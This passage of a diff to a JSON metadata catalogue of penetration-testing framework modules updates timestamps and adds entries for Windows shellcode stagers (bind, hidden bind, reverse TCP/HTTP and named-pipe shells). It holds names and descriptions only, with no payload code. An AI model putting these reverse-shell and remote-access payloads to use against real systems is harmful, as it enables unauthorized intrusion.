    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp",
@@ -179101,7 +182840,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4",
@@ -179137,7 +182876,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid",
@@ -179172,7 +182911,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp",
@@ -179212,7 +182951,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4",
@@ -179248,7 +182987,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid",
@@ -179283,7 +183022,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp",
@@ -179318,7 +183057,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp",
@@ -179354,7 +183093,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp",
@@ -179391,7 +183130,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -179428,7 +183167,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe",
@@ -179464,7 +183203,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp",
@@ -179505,7 +183244,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4",
@@ -179542,7 +183281,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid",
@@ -179579,7 +183318,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http",
@@ -179618,7 +183357,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https",
@@ -179654,7 +183393,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp",
@@ -179695,7 +183434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4",
@@ -179732,7 +183471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid",
@@ -179769,7 +183508,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp",
@@ -179806,7 +183545,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps",
@@ -186626,7 +190365,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-13 13:09:00 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "php/meterpreter_reverse_tcp",
@@ -187004,7 +190743,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_bind_tcp",
@@ -187038,7 +190777,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_http",
@@ -187072,7 +190811,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_https",
@@ -187106,7 +190845,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-05 18:44:20 +0000",
+    "mod_time": "2022-05-17 10:51:20 +0000",
    "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter_reverse_tcp",
@@ -187872,6 +191611,1028 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_windows/custom/bind_hidden_ipknock_tcp": {
+    "name": "Windows shellcode stage, Hidden Bind Ipknock TCP Stager",
+    "fullname": "payload/windows/custom/bind_hidden_ipknock_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_hidden_ipknock_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_hidden_tcp": {
+    "name": "Windows shellcode stage, Hidden Bind TCP Stager",
+    "fullname": "payload/windows/custom/bind_hidden_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_hidden_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_ipv6_tcp": {
+    "name": "Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)",
+    "fullname": "payload/windows/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_ipv6_tcp_uuid": {
+    "name": "Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/windows/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_named_pipe": {
+    "name": "Windows shellcode stage, Windows x86 Bind Named Pipe Stager",
+    "fullname": "payload/windows/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_nonx_tcp": {
+    "name": "Windows shellcode stage, Bind TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/custom/bind_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_tcp": {
+    "name": "Windows shellcode stage, Bind TCP Stager (Windows x86)",
+    "fullname": "payload/windows/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_tcp_rc4": {
+    "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/bind_tcp_uuid": {
+    "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)",
+    "fullname": "payload/windows/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/find_tag": {
+    "name": "Windows shellcode stage, Find Tag Ordinal Stager",
+    "fullname": "payload/windows/custom/find_tag",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "skape <mmiller@hick.org>"
+    ],
+    "description": "Custom shellcode stage. Use an established connection",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/findtag_ord.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/find_tag",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_hop_http": {
+    "name": "Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager",
+    "fullname": "payload/windows/custom/reverse_hop_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "scriptjunkie <scriptjunkie@scriptjunkie.us>",
+      "bannedit <bannedit@metasploit.com>",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_hop_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_http": {
+    "name": "Windows shellcode stage, Windows Reverse HTTP Stager (wininet)",
+    "fullname": "payload/windows/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2021-11-10 12:33:52 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_http.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_http_proxy_pstore": {
+    "name": "Windows shellcode stage, Reverse HTTP Stager Proxy",
+    "fullname": "payload/windows/custom/reverse_http_proxy_pstore",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_http_proxy_pstore",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_https": {
+    "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)",
+    "fullname": "payload/windows/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2021-11-10 12:33:52 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_https.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_https_proxy": {
+    "name": "Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy",
+    "fullname": "payload/windows/custom/reverse_https_proxy",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "corelanc0d3r <peter.ve@corelan.be>",
+      "amaloteaux <alex_maloteaux@metasploit.com>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_https_proxy",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_ipv6_tcp": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (IPv6)",
+    "fullname": "payload/windows/custom/reverse_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker over IPv6",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_named_pipe": {
+    "name": "Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/windows/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_nonx_tcp": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/custom/reverse_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_ord_tcp": {
+    "name": "Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/custom/reverse_ord_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "spoonm <spoonm@no$email.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_ord_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp": {
+    "name": "Windows shellcode stage, Reverse TCP Stager",
+    "fullname": "payload/windows/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_allports": {
+    "name": "Windows shellcode stage, Reverse All-Port TCP Stager",
+    "fullname": "payload/windows/custom/reverse_tcp_allports",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
